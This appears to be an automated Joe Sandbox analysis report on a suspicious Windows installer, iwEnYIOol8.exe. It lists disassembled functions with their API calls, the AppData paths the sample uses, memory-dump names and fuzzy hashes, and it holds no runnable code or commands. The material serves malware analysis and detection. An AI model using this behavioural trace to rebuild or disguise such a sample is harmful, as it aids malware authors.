Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C

Function 0040450B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08

Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 004044F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,771B23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,771B23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,771B23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, mil.ia",?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, mil.ia",?), ref: 00405B70

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

Non-executed Functions

Function 004049C7 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(: Completed,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,: Completed), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\iwEnYIOol8.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,0040350D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\iwEnYIOol8.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,0040350D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,0040350D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

A, xrefs: 00404AEA
: Completed, xrefs: 00404B28, 00404B2D, 00404B38
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00404B17

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Roaming\erstatningsgraden
API String ID: 2624150263-911401685
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\erstatningsgraden\Starlettens
API String ID: 542301482-3115307435
Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Function 00406DC6 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05

Function 0040759D Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

M, xrefs: 004050F7
N, xrefs: 004051D8
, xrefs: 00405511

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
GetDlgItem.USER32(?,000003E8), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

: Completed, xrefs: 00404872
N, xrefs: 00404831

Memory Dump Source

Source File: 00000000.00000002.1310244692.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1310218081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310278159.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310305413.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310502436.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_iwEnYIOol8.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
